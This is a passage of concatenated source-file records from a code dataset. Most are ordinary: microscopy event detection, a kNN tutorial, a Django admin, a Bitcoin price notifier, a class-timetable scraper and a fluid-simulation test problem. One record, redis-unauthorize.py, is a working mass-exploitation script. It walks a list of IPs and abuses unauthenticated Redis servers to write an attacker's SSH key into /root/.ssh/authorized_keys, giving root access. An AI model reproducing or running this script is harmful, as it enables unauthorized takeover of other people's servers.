y)\n\n        for u_z in np.unique(mat[:,2]):\n            u,v = np.meshgrid(np.arange(x-2, x+3), np.arange(y-2, y+3))\n            m_z = np.full(len(u), u_z).reshape(-1,1)\n            for u_x in u:\n                for u_y in v: \n                    disk_points += list(np.hstack((u_x.reshape(-1,1), u_y.reshape(-1,1), m_z)))\n\n        self.pts = [Point(*p) for p in disk_points]\n\nclass EventManager:\n    \n    def 
__init__(self, events):\n \n self.evt = events\n \n def filterAreaVolume(self, min_area=10, min_volume=10):\n \n list_evt = []\n for event in self.evt: \n a,v = event.getAreaVolume()\n if (a > min_area) and (v > min_volume): list_evt.append(event)\n self.evt = list_evt\n \n def focusAreas(self):\n \n for event in self.evt: event.focus()\n \n def display(self):\n \n points = np.vstack([e.getPoints() for e in self.evt if len(e.pts) > 0])\n \n x,y,z = points[:,0], points[:,1], points[:,2]\n arg = {'mode': 'markers', 'marker': dict(size=3, color=points[:,3])}\n fig = go.Figure(data=[go.Scatter3d(x=x, y=y, z=z, **arg)])\n fig.update_layout(margin=dict(l=0, r=0, b=0, t=0))\n fig.show()\n \n def getEventContours(self,out=True):\n '''\n Get the max & min values of x, y, z for each event and store in numpy\n array\n \n If out is set to \"True\", return the event countours\n '''\n Res = np.zeros((len(self.evt),6),dtype=np.int_)\n Res = pd.DataFrame(Res,columns = ['x_min','x_max','y_min','y_max','z_min','z_max'])\n for idx in range(len(self.evt)):\n e = self.evt[idx]\n Pts = e.getPoints()\n Res.loc[idx,['x_min','y_min','z_min']] = np.amin(Pts[:,:-1],axis=0)\n Res.loc[idx,['x_max','y_max','z_max']] = np.amax(Pts[:,:-1],axis=0)\n self.Contours = Res\n if out:\n return Res\n \n def MapROI(self,ROI,x_err=5,y_err=5,z_err=9):\n '''\n Map a given ROI to its corresponding event using the following criteria:\n \n Spatially event should not be more than 5 pixels off from ROI\n Temporally event should not be more than 10 frames off from ROI\n \n Criteria can be altered by changing the values of x_err, y_err, & z_err\n \n Arguments:\n ROI: ROI object containing x, y, z, width, & length info\n x_err,y_err,z_err: int, the error tolerance (pixels for x_err, y_err, frames for z_err)\n \n Returns:\n numpy array containing the event roi index, empty if no \n corresponding event found.\n '''\n try:\n Cntrs = self.Contours\n except:\n Cntrs = self.getEventContours()\n I_x = ~((Cntrs['x_max'] < ROI.x-x_err) | (Cntrs['x_min'] > ROI.x+ROI.w+x_err))\n I_y = ~((Cntrs['y_max'] < ROI.y-y_err) | (Cntrs['y_min'] > ROI.y+ROI.h+y_err))\n I_z = ~((Cntrs['z_max'] < ROI.z-z_err) | (Cntrs['z_min'] > ROI.z+z_err))\n IDX = I_x & I_y & I_z\n return np.where(IDX)[0]\n \n def MapROIs(self,RS,*args,**kwargs):\n '''\n Map a given set of ROIs to their corresponding events\n \n Arguments:\n RS: ROISet object\n *args, **kwargs will be passed to MapROI method\n \n Returns:\n dictionary with ROI names as keys\n '''\n ans = {}\n for idx in range(RS.size):\n r = RS.ROIs[idx]\n name = RS.ROI_list.iloc[idx]\n ans[name] = self.MapROI(r,*args,**kwargs)\n return ans\n \nclass ROI(object):\n def __init__(self,bx,by,width,height,z,pixel_res=1):\n '''\n bx: horizontal coordinate of the top left corner\n by: vertical coordinate of the top left corner\n width: horizontal length of the ROI box\n height: vertical length of the ROI box\n z: Slice\n pixel_res: float. factor to convert units into pixel number\n '''\n # Invert the x and y axes so as to be compatible with numpy indexing\n self.x = round(by/pixel_res)\n self.y = round(bx/pixel_res)\n self.h = round(width/pixel_res)\n self.w = round(height/pixel_res)\n self.z = int(z)\n \n \nclass ROISet(object):\n def __init__(self,path,pixel_res=1):\n '''\n path: str, specifies a .csv files with ROI information\n pixel_res: float. 
Unit per pixel conversion factor if ROIs are not\n            specified in pixels\n        '''\n        df = pd.read_csv(path,index_col=0)\n        # Infer ROI names\n        ind = df.index.copy().astype(str)\n        ind = ind.str.rjust(3,'0')\n        self.ROI_list = pd.Series('ROI' + ind,index=df.index) # Store the list of ROIs\n        # Get total number of ROIs in set\n        self.size = ind.size\n        # Create separate ROI object for each element in set\n        ls = []\n        for idx in range(self.size):\n            params = df.iloc[idx][['BX','BY','Width','Height','Slice']]\n            roi = ROI(*params,pixel_res)\n            ls.append(roi)\n        self.ROIs = ls","sub_path":"package/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":14329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"250990018","text":"h_list = [None] * 26\nprint(h_list)\n\ndef my_append(value):\n    index = ord(value[0]) - ord('a')\n    h_list[index] = value\n    print(h_list)\n\na = 'apricot'\nmy_append(a)\n\nb = 'banana'\nmy_append(b)\n\nc = 'apple'\nmy_append(c) # hash collision\n\ndef my_index(value): # the simplest possible hash function\n    letter = 26\n    index = 0\n    size = 10000\n\n    for i, char in enumerate(value):\n        index += (ord(char) - ord('a') +1) * letter ** i\n\n    return index % size\n\nprint(my_index(a))\nprint(my_index(b))\nprint(my_index(c))","sub_path":"lesson_9/lesson_9_theory_hash.py","file_name":"lesson_9_theory_hash.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546155028","text":"from setuptools import setup\nfrom setuptools import find_packages\n\nREQUIRED_PYTHON = (3, 1)\n\nsetup(name='Fitv',\n      version='0.1.0',\n      python_requires='>={}.{}'.format(*REQUIRED_PYTHON),\n      description='Optimizing UI Test Automation',\n      long_description=open('README.md').read(),\n      url='https://github.com/jcomish/Fitv',\n      author='Joshua Comish',\n      author_email='jcomish@sourceiron.com',\n      license='Apache 2.0',\n      keywords='automation qa selenium',\n      packages=['Fitv', 'Fitv/Assertions', 'Fitv/Exceptions', 'Fitv/FitActions', 'Fitv/FitActions/Basic',\n                'Fitv/FitActions/Basic/Mobile', 'Fitv/FitActions/Basic/Web'],\n      # packages=find_packages(include=['Fitv', 'Assertions', 'Drivers', 'Exceptions', 'FitActions'], exclude=['Fitv.FitPage', ]),\n      install_requires=['behave>=1.2.6',\n                        'selenium>=3.12.0',\n                        'requests>=1.0.2'])\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"602271152","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom .models import Profile\nfrom .forms import ProfileCreationForm\n\n\ndef deactivate(modeladmin, request, queryset):\n    queryset.update(is_active=False)  # clear the active flag, as the action name says\ndeactivate.short_description = \"Deactivate selected users\"\n\n\nclass ProfileAdmin(UserAdmin):\n    add_form = ProfileCreationForm\n\n    date_hierarchy = 'date_joined'\n    list_filter = ('is_staff', 'is_superuser', 'is_active', 'groups', 'date_joined')\n    list_display = ('username', 'display_name', 'first_name', 'last_name', 'email', 'is_active', 'is_staff')\n    search_fields = ('username', 'first_name', 'last_name', 'email', 'display_name')\n    actions = [deactivate, ]\n\n\n    def get_form(self, request, obj=None, **kwargs):\n        \"\"\"\n        Use special form during user creation\n        \"\"\"\n        defaults = {}\n        if obj is None:\n            defaults['form'] = self.add_form\n        defaults.update(kwargs)\n        return super(ProfileAdmin, self).get_form(request, obj, 
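End to end, the classes.py record above chains as: `Video` estimates the noise level and static background at construction, `process()` extracts candidate pixels per frame and DBSCAN-clusters them into `Event`s, and `EventManager` filters the events and maps them to ImageJ-style ROIs. A minimal driver sketch (both file names are hypothetical):

```python
video = Video('recording.nd2', verbose=True)   # hypothetical ND2 recording
events = video.process(max_distance=3)         # list of clustered Event objects

manager = EventManager(events)
manager.filterAreaVolume(min_area=10, min_volume=10)  # drop tiny detections
manager.focusAreas()                                  # re-centre each event on a small disk

rois = ROISet('rois.csv')                      # hypothetical ImageJ ROI export
print(manager.MapROIs(rois))                   # {ROI name: indices of matching events}
```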
**defaults)\n\nadmin.site.register(Profile, ProfileAdmin)\n","sub_path":"tango_user/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"55203159","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport smtplib\nimport pytz\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom datetime import datetime\nfrom itertools import chain\nfrom urllib import request\n\nfrom con import foxbit, contact\n\n\ndef save_foxbit():\n    url = 'https://api.blinktrade.com/api/v1/BRL/ticker?crypto_currency=BTC'\n    resp = request.urlopen(url).read()\n    data = json.loads(resp.decode('utf-8'))\n    data['timestamp'] = datetime.now(pytz.timezone('America/Sao_Paulo'))\n    last_data = foxbit.find().sort('timestamp', -1)\n    if last_data.count() > 0:\n        last_data = last_data[0]\n        if last_data['last'] != data['last']:\n            foxbit.insert_one(data)\n            send_notification(data)\n    else:\n        foxbit.insert_one(data)\n        send_notification(data)\n\n\ndef save_contact(data):\n    contact.insert_one(data)\n\n\ndef send_notification(data):\n    all_contacts = getting_contacts_notification(data)\n    username = os.environ.get('MANDRILL_USERNAME', None)\n    password = os.environ.get('MANDRILL_PASSWORD', None)\n    if username and password:\n        smtp = smtplib.SMTP('smtp.mandrillapp.com', 587)\n        smtp.login(username, password)\n    else:\n        smtp = None\n\n    for item in all_contacts:\n        msg = MIMEMultipart('alternative')\n        msg['Subject'] = 'Bitcoins Notification'\n        msg['From'] = 'Bitcoins Notification '\n        msg['To'] = item['email']\n\n        if item['rules'] == 'menor':  # the contact document's rule, not the collection\n            above_below = 'abaixo'\n        else:\n            above_below = 'acima'\n\n        text = 'Atenção! O valor do Bitcion está {above_below} de R$ {value}, o Bitcoin está valendo R$ {last}.'\n        text = text.format(\n            above_below=above_below, value=item['value'], last=data['last'])\n        part = MIMEText(text, 'plain')\n        if smtp:\n            msg.attach(part)\n            smtp.sendmail(msg['From'], msg['To'], msg.as_string())\n        else:\n            # Is running local\n            print(text)\n            print(msg['From'])\n            print(msg['To'])\n        contact.update_one({'_id': item['_id']}, {'$set': {'sent': True}})\n    if smtp:\n        smtp.quit()\n\n\ndef getting_contacts_notification(data):\n    lower_than = contact.find({\n        'rules': 'menor',\n        'sent': False,\n        'value': {'$gt': data['last']}\n    })\n    upper_than = contact.find({\n        'rules': 'maior',\n        'sent': False,\n        'value': {'$lt': data['last']}\n    })\n\n    if lower_than and upper_than:\n        all_contacts = [i for i in chain(lower_than, upper_than)]\n    elif lower_than and not upper_than:\n        all_contacts = lower_than\n    elif not lower_than and upper_than:\n        all_contacts = upper_than\n\n    return all_contacts\n","sub_path":"actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"424135729","text":"\r\ndef scrap(album_num):\r\n\r\n    from selenium import webdriver\r\n    from selenium.common.exceptions import TimeoutException\r\n    from selenium.webdriver.common.by import By\r\n    from selenium.webdriver.support import expected_conditions as EC\r\n    from selenium.webdriver.support.wait import WebDriverWait\r\n    from selenium.webdriver.chrome.options import Options\r\n    import csv\r\n    import re\r\n    import requests\r\n    import time\r\n    import os\r\n    from bs4 import BeautifulSoup\r\n\r\n    URL = 
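The two cursors in `getting_contacts_notification` above can be fetched in a single `$or` query; that also sidesteps the branching on cursor truthiness (PyMongo cursors are generally truthy even when they match nothing, so only the first branch ever runs). A sketch of the equivalent query (the function name is invented):

```python
def contacts_to_notify(last_price):
    # Contacts waiting for a drop below their threshold, or a rise above it.
    return contact.find({
        'sent': False,
        '$or': [
            {'rules': 'menor', 'value': {'$gt': last_price}},
            {'rules': 'maior', 'value': {'$lt': last_price}},
        ],
    })
```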
'https://estudent.wsei.edu.pl/SG/PublicDesktop.aspx?fileShareToken=95-88-6B-EB-B0-75-96-FB-A9-7C-AE-D7-5C-DB-90-49'\r\n\r\n    chrome_options = Options()\r\n    chrome_options.add_argument(\"--headless\")\r\n    chrome_options.add_argument(\"--window-size=1920x1080\")\r\n    driver_path = '/usr/lib/chromium-browser/chromedriver'\r\n    driver = webdriver.Chrome(options=chrome_options,\r\n                              executable_path=driver_path)\r\n\r\n    driver.get(URL)\r\n    time.sleep(6)\r\n    driver.execute_script(\r\n        \"var p = document.createElement('p');p.id='albumNum';p.innerText=arguments[0];document.body.appendChild(p);\", album_num)\r\n    driver.execute_script(open('./simulateActions.js').read())\r\n    time.sleep(6)\r\n    html = driver.page_source\r\n    soup = BeautifulSoup(html, 'html.parser')\r\n\r\n    grid_row = soup.find_all(class_='grid-row')\r\n    grid_row_alternating = soup.find_all(class_='grid-row-alternating')\r\n\r\n    grid_rows_combined = []\r\n    for a, b in zip(grid_row_alternating, grid_row):\r\n        grid_rows_combined.append(a)\r\n        grid_rows_combined.append(b)\r\n\r\n    classes = []\r\n    for item in grid_rows_combined:\r\n        tdTag = item.find_all('td')\r\n        temp = []\r\n        for tag in tdTag:\r\n            temp.append(tag.text)\r\n\r\n        date = temp[1]\r\n        day = temp[2]\r\n        start = temp[3]\r\n        end = temp[4]\r\n        hours = temp[5]\r\n        subject = temp[6]\r\n        classrom = temp[7]\r\n        lecturer = temp[8]\r\n        classID = temp[9]\r\n        classes.append([date, day, start, end, hours,\r\n                        subject, classrom, lecturer, classID])\r\n        temp = []\r\n\r\n    if not os.path.exists(f'../data/{album_num}'):\r\n        os.makedirs(f'../data/{album_num}')\r\n\r\n    with open(f'../data/{album_num}/Classes{album_num}.csv', 'w', newline='', encoding='UTF-8') as fp:\r\n        a = csv.writer(fp, delimiter=',')\r\n        data = [['Date', 'Day', 'Start', 'End', 'Hours',\r\n                 'Subject', 'Classrom', 'Lecturer', 'ClassID'], *classes]\r\n        a.writerows(data)\r\n","sub_path":"flask/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"526501491","text":"import random, os, glob, shutil\n\n# Config variables\ntrain_test_ratio = 0.9\ntrain_val_ratio = 0.2\nbase_directory = './images/raw/DR'\n\n# Make train, test directories\ntrain_directory = base_directory + '/train'\nval_directory = base_directory + '/val'\ntest_directory = base_directory + '/test'\nif not os.path.exists(train_directory):\n\tos.makedirs(train_directory)\nif not os.path.exists(val_directory):\n\tos.makedirs(val_directory)\nif not os.path.exists(test_directory):\n\tos.makedirs(test_directory)\n\nfiles = glob.glob(base_directory + '/*.mat')\nrandom.shuffle(files)\n\ntrain_size = int(train_test_ratio * len(files))\n\ntrain_files = files[:train_size]\ntest_files = files[train_size:]\n\nval_size = int(train_val_ratio * len(train_files))\nval_files = train_files[:val_size]\ntrain_files = train_files[val_size:]\n\nfor f in train_files:\n\tshutil.move(f, train_directory)\nfor f in val_files:\n\tshutil.move(f, val_directory)\nfor f in test_files:\n\tshutil.move(f, test_directory)","sub_path":"split_train_test.py","file_name":"split_train_test.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387909805","text":"from numpy import array, tile, zeros, shape\r\nimport operator\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n'''\r\n@function: Build a small toy dataset for demonstration\r\n'''\r\n\r\n\r\ndef create_dataset():\r\n    group = array([[1.0, 1.1], [1.0, 1.0], [0.0, 0.0], [0.0, 0.1]])\r\n    labels = ['A', 'A', 'B', 'B']\r\n    return group, labels\r\n\r\n\r\n'''\r\n@function: kNN classifier implementation\r\n@params:\r\ninx: the sample to classify\r\ndataset: the reference dataset\r\nlabels: labels of the reference dataset\r\nk: number of nearest neighbours that get a vote\r\n'''\r\n\r\n\r\ndef knn(inx, dataset, labels, k):\r\n    dataset_size = dataset.shape[0]  # number of points in the dataset\r\n    diff_mat = tile(inx, (dataset_size, 1)) - dataset  # tile the query point over the rows and subtract\r\n    distances_mat = (diff_mat ** 2).sum(axis=1)  # squared distance to every point\r\n    distances_mat = distances_mat ** 0.5\r\n    sorted_dist_indices = distances_mat.argsort()  # sort the distances, returning indices\r\n    class_count = {}  # occurrence count of each class among the k nearest points\r\n    for i in range(k):\r\n        vote_label = labels[sorted_dist_indices[i]]\r\n        # dict.get returns the value for the key, with the second argument as default\r\n        class_count[vote_label] = class_count.get(vote_label, 0) + 1\r\n    # dict.items returns all key/value pairs as tuples\r\n    sorted_class_count = sorted(class_count.items(),\r\n                                key=operator.itemgetter(1), reverse=True)\r\n    return sorted_class_count[0][0]\r\n\r\n\r\n'''\r\n@function: Read the file contents into matrix form\r\nThe file columns are:\r\nfrequent flyer miles earned per year\r\npercentage of time spent playing video games\r\nliters of ice cream consumed per week\r\ndegree of liking\r\n'''\r\n\r\n\r\ndef file2matrix(filename):\r\n    fr = open(filename)\r\n    lines = fr.readlines()\r\n    num_lines = len(lines)\r\n    data = zeros((num_lines, 3))  # data matrix\r\n    labels = []  # labels\r\n    str_labels = [\"didn't like\", \"small doses\", \"large doses\"]\r\n    index = 0\r\n    for line in lines:\r\n        line = line.strip()  # strip leading/trailing characters (whitespace by default)\r\n        list_line = line.split('\\t')  # split on the tab character into four fields\r\n        data[index, :] = list_line[0:3]  # the first three values go into the data matrix\r\n        labels.append(str_labels[int(list_line[-1])-1])  # append the final value (the label) to the label list\r\n        index += 1\r\n    return data, labels  # return the data matrix and the labels\r\n\r\n\r\n'''\r\n@function: Normalize the data\r\n'''\r\n\r\n\r\ndef auto_norm(data):\r\n    min_value = data.min(0)  # column-wise minimum\r\n    max_value = data.max(0)  # likewise, the column-wise maximum\r\n    num_ranges = max_value - min_value\r\n    norm_data = zeros(shape(data))\r\n    m = data.shape[0]\r\n    norm_data = data - tile(min_value, (m, 1))\r\n    norm_data = norm_data / tile(num_ranges, (m, 1))\r\n    return norm_data, num_ranges, min_value\r\n\r\n\r\n'''\r\n@function: Test the classifier\r\n'''\r\n\r\n\r\ndef class_test(data, labels, ho_ratio):\r\n    norm_data, num_ranges, min_value = auto_norm(data)\r\n    m = norm_data.shape[0]\r\n    num_tests = int(m * ho_ratio)  # number of samples held out for testing\r\n    error_count = 0.0\r\n    for i in range(num_tests):\r\n        classifier_result = knn(norm_data[i, :],\r\n                                norm_data[num_tests:m, :],\r\n                                labels[num_tests:m], 3)\r\n        # print('the classifier came back with: %s, the real answer is : %s'\r\n        #       % (classifier_result, labels[i]))\r\n        if classifier_result != labels[i]:  # '!=' compares values; 'is not' compared identity\r\n            error_count += 1.0\r\n    # print('the total error rate is: %f' % (error_count / float(num_tests)))\r\n    return error_count / float(num_tests)\r\n\r\n\r\n'''\r\n@function: Make a prediction\r\n'''\r\n\r\n\r\ndef classify_person(data, labels, flying_miles, playing_games_per, icecream_consume):\r\n    # flying_miles = float(input(\"Frequent flyer miles earned per year: \"))\r\n    # playing_games_per = float(input(\"Percentage of time spent playing video games: \"))\r\n    # icecream_consume = float(input(\"Liters of ice cream consumed per week: \"))\r\n    norm_data, num_ranges, min_value = auto_norm(data)\r\n    person = array([flying_miles, playing_games_per, icecream_consume])\r\n    classifier_result = knn((person - min_value) /\r\n                            num_ranges, norm_data, labels, 3)\r\n    # print('Estimated degree of liking for this person:', classifier_result)\r\n    return classifier_result\r\n\r\n\r\ndef draw_data(data, labels):\r\n    plt.rcParams['font.sans-serif'] = ['Simhei']\r\n    plt.rcParams['axes.unicode_minus'] = False\r\n    fig = plt.figure()\r\n    ax = fig.add_subplot(111)\r\n    # ax.scatter(data_mat[:, 0], data_mat[:, 1],\r\n    #            10.0 * array(class_labels), 10.0 * array(class_labels))\r\n    type1_x, type1_y = [], []\r\n    type2_x, type2_y = [], []\r\n    type3_x, type3_y = [], []\r\n    for i in range(len(labels)):\r\n        if labels[i] == 1:  # '==' rather than 'is': identity checks on ints are unreliable\r\n            type1_x.append(data[i][0])\r\n            type1_y.append(data[i][1])\r\n        if labels[i] == 2:\r\n            type2_x.append(data[i][0])\r\n            type2_y.append(data[i][1])\r\n        if labels[i] == 3:\r\n            type3_x.append(data[i][0])\r\n            type3_y.append(data[i][1])\r\n    type1 = ax.scatter(type1_x, type1_y, s=10, c='r')\r\n    type2 = ax.scatter(type2_x, type2_y, s=10, c='g')\r\n    type3 = ax.scatter(type3_x, type3_y, s=10, c='b')\r\n    plt.legend((type1, type2, type3),\r\n               ('didntLike', 'smallDoses', 'largeDoses'))\r\n    plt.show()\r\n\r\n\r\n'''\r\n@function: Convert an image file into a vector\r\n'''\r\n\r\n\r\ndef img2vector(filename):\r\n    returnvect = zeros((1, 1024))\r\n    fr = open(filename)\r\n    for i in range(32):\r\n        linestr = fr.readline()\r\n        for j in range(32):\r\n            returnvect[0, 32*i+j] = int(linestr[j])\r\n    return returnvect\r\n\r\n\r\n'''\r\n@function: Test code for the handwritten digit recognition system\r\n'''\r\n\r\n\r\ndef handwriting_class_test():\r\n\thwlabels = []\r\n\ttrainingfile_list = os.listdir('digits/trainingDigits/')\r\n\tm = len(trainingfile_list) # total number of training files\r\n\ttraining_mat = zeros((m, 1024))\r\n\tfor i in range(m):\r\n\t\tfilename_str = trainingfile_list[i] # the file name\r\n\t\tfilename_str_pre = filename_str.split('.')[0] # the name without its extension\r\n\t\tclass_num = int(filename_str_pre.split('_')[0])\r\n\t\thwlabels.append(class_num)\r\n\t\ttraining_mat[i, :] = img2vector('digits/trainingDigits/%s' %filename_str)\r\n\ttestfile_list = os.listdir('digits/testDigits/')\r\n\terror_count = 0.0\r\n\tmTest = len(testfile_list)\r\n\tfor i in range(mTest):\r\n\t\tfilename_str = testfile_list[i]\r\n\t\tfilename_str_pre = filename_str.split('.')[0] # the name without its extension\r\n\t\tclass_num = int(filename_str_pre.split('_')[0])\r\n\t\tvectest = img2vector('digits/testDigits/%s' %filename_str)\r\n\t\tclass_result = knn(vectest, training_mat, hwlabels, 3)\r\n\t\t# print('the classifier came back with: %d, the real answer is %d' \r\n\t\t# \t% (class_result, class_num))\r\n\t\tif class_result != class_num:\r\n\t\t\terror_count += 1.0\r\n\t\t\tprint('the classifier came back with: %d, the real answer is %d' \r\n\t\t\t\t% (class_result, class_num))\r\n\tprint('the total number of errors is: %d' % error_count)\r\n\tprint('the total error rate is: %f' % (error_count/float(mTest)))\r\n\r\n\r\nif __name__ == '__main__':\r\n    # groups, labels = create_dataset()\r\n    # result = knn([0, 0], groups, labels, 3)\r\n    # print(result)\r\n    # data, labels = file2matrix('datingTestSet2.txt')\r\n    # draw_data(data, labels)\r\n    # print(data)\r\n    # class_test(data, labels, 0.10)\r\n    # print(classify_person(data, labels, 10000.0, 10.0, 0.06))\r\n    # testvect = img2vector('digits/testDigits/0_0.txt')\r\n    # print(testvect[0, 0:31])\r\n    # print(testvect[0, 32:63])\r\n    handwriting_class_test()\r\n","sub_path":"KNN/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"436176167","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom cloqwerk.services.Base import Base\nfrom cloqwerk.services.TimesheetService import TimesheetService\nfrom cloqwerk.services.TimeEntryService import TimeEntryService\nfrom cloqwerk.models.User import User\nfrom cloqwerk.models.TimeEntry import TimeEntry\nfrom datetime import datetime\n\nclass UserService(Base):\n    __model__ = User\n\n    def by_username(self, username):\n        try:\n            return 
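A quick smoke test of the kNN record above on its toy dataset; with `k=3`, a point near the origin lands in class 'B' because two of its three nearest neighbours are 'B':

```python
groups, labels = create_dataset()
print(knn([0.2, 0.1], groups, labels, 3))   # -> 'B'

# On the dating data the features must be normalized first (auto_norm does this
# inside class_test), otherwise the mileage column dominates the Euclidean distance:
# data, labels = file2matrix('datingTestSet2.txt')
# print(class_test(data, labels, 0.10))     # error rate with 10% of rows held out
```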
self.session.query(User).filter_by(username=username).one()\n except:\n return None\n\n def time_entry(self, user_id, action):\n try:\n u = UserService().get(user_id)\n ts = TimesheetService().todays_timesheet()\n te = TimeEntry(\n action = action,\n time = datetime.now(),\n user_id = u.id,\n timesheet_id = ts.id\n )\n u.time_entries.append(te)\n self.session.add(ts)\n self.session.commit()\n return te\n except:\n self.session.rollback()\n return False\n\n def week(self, user):\n log = []\n for ts in TimesheetService().last_7():\n clock_in = TimeEntryService().clocked_in(user, ts.date)\n clock_out = TimeEntryService().clocked_out(user, ts.date)\n IN = clock_in.time.strftime(\"%H:%M\") if clock_in else \"\"\n OUT = clock_out.time.strftime(\"%H:%M\") if clock_out else \"\"\n log.append(\n {\n \"date\": ts.date.strftime(\"%m/%d/%Y\"),\n \"in\": IN,\n \"out\": OUT,\n \"hours\": \"{:.2f}\".format((clock_out.time-clock_in.time)\\\n .total_seconds()/3600) if clock_in and clock_out else \"\"\n }\n )\n return log\n","sub_path":"cloqwerk/services/UserService.py","file_name":"UserService.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52479492","text":"import os\nimport json\nfrom multiprocessing.pool import ThreadPool as Pool\n\ndef process_thread(ip):\n try:\n ip = ip.replace('http://', '')\n if len(ip) > 25:\n return\n if ':' in ip:\n ip, port = ip.split(':')\n else:\n port = 6379\n\n print('trying:' + ip + ':' + port)\n result = os.popen(\n \"echo '\\n\\nssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo/Hp7BruXfPnUKuGbPqJTsSmLfh+i9CAGwOFTrEeEaali8s8mLGY99MfaZ9TeddrkuiasAldXpRZgHnPdn6PYDIsptXU/6I9kUuhtKkFZlQlKtt7DTzi5nOkfTV08WTnpDE5JElC15xR+vh35cjnOKXT3piavLnCvKr2BQkie8baHPnX98IaBmhZDB32gqztnVV6r1lUZnEOR/Fs4DmUj94fYw+HSoqRV4R17437FR24R247k14vmA7CsUCRBzQBvBvHUIwuYm7hcvGHXghlrQ5I1KJnFCj5qNegGouIu34nnfMbXleo0ShmsoDfeTCbZIXjPAcqYXvQlrBjNqzJVw== root@XYLink.GW\\n\\n'|redis-cli -h \" + ip + \" -p \" + port + \" -x set test\")\n if 'OK' in result.read():\n result = os.popen(\"echo 'config set dir /root/.ssh'|redis-cli -h \" + ip + ' -x')\n if 'OK' in result.read():\n result = os.popen(\"echo 'config set dbfilename \\'authorized_keys\\''|redis-cli -h \" + ip + ' -x')\n result = os.popen(\"echo 'save'|redis-cli -h \" + ip + ' -x')\n print('[+]', ip, port, result.read())\n except AssertionError:\n print('timeout')\n\nif __name__ == '__main__':\n threads = Pool(10)\n ips = []\n with open('redis.json','r') as redis_content:\n ips = json.loads(redis_content.read())\n for ip in ips:\n threads.apply_async(process_thread, args=(ip,))\n\n threads.close()\n threads.join()\n","sub_path":"redis-unauthorize.py","file_name":"redis-unauthorize.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"520106279","text":"r\"\"\"\nInitialize a smooth incompressible convergence test. Here, the\nvelocities are initialized as\n\n.. math::\n\n u(x,y) = 1 - 2 \\cos(2 \\pi x) \\sin(2 \\pi y)\n\n v(x,y) = 1 + 2 \\sin(2 \\pi x) \\cos(2 \\pi y)\n\nand the exact solution at some later time t is then\n\n.. 
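A sketch of the intended punch-clock flow for the `UserService` above (the username is hypothetical, and the `'in'`/`'out'` action labels are assumed; the real labels are whatever `TimeEntryService.clocked_in`/`clocked_out` look for):

```python
svc = UserService()
user = svc.by_username('jdoe')          # hypothetical username; returns None if absent
if user is not None:
    svc.time_entry(user.id, 'in')       # assumed action label: clock in on today's timesheet
    # ... end of the workday ...
    svc.time_entry(user.id, 'out')      # assumed action label: clock out
    for day in svc.week(user):          # one dict per timesheet over the last 7 days
        print(day['date'], day['in'], day['out'], day['hours'])
```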
math::\n\n    u(x,y,t) = 1 - 2 \cos(2 \pi (x - t)) \sin(2 \pi (y - t))\n\n    v(x,y,t) = 1 + 2 \sin(2 \pi (x - t)) \cos(2 \pi (y - t))\n\n    p(x,y,t) = -\cos(4 \pi (x - t)) - \cos(4 \pi (y - t))\n\nThe numerical solution can be compared to the exact solution to\nmeasure the convergence rate of the algorithm.\n\n\"\"\"\n\n\nimport math\n\nimport numpy as np\n\nfrom pyro.mesh import patch\nfrom pyro.util import msg\n\n\ndef init_data(my_data, rp):\n    \"\"\" initialize the incompressible converge problem \"\"\"\n    del rp  # this problem doesn't use runtime params\n\n    msg.bold(\"initializing the incompressible converge problem...\")\n\n    # make sure that we are passed a valid patch object\n    if not isinstance(my_data, patch.CellCenterData2d):\n        print(my_data.__class__)\n        msg.fail(\"ERROR: patch invalid in converge.py\")\n\n    # get the velocities\n    u = my_data.get_var(\"x-velocity\")\n    v = my_data.get_var(\"y-velocity\")\n\n    myg = my_data.grid\n\n    if (myg.xmin != 0 or myg.xmax != 1 or\n            myg.ymin != 0 or myg.ymax != 1):\n        msg.fail(\"ERROR: domain should be a unit square\")\n\n    u[:, :] = 1.0 - 2.0*np.cos(2.0*math.pi*myg.x2d)*np.sin(2.0*math.pi*myg.y2d)\n    v[:, :] = 1.0 + 2.0*np.sin(2.0*math.pi*myg.x2d)*np.cos(2.0*math.pi*myg.y2d)\n\n\ndef finalize():\n    \"\"\" print out any information to the user at the end of the run \"\"\"\n\n    ostr = \"\"\"\n          Comparisons to the analytic solution can be done using\n          analysis/incomp_converge_error.py\n          \"\"\"\n\n    print(ostr)\n","sub_path":"pyro/incompressible/problems/converge.py","file_name":"converge.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
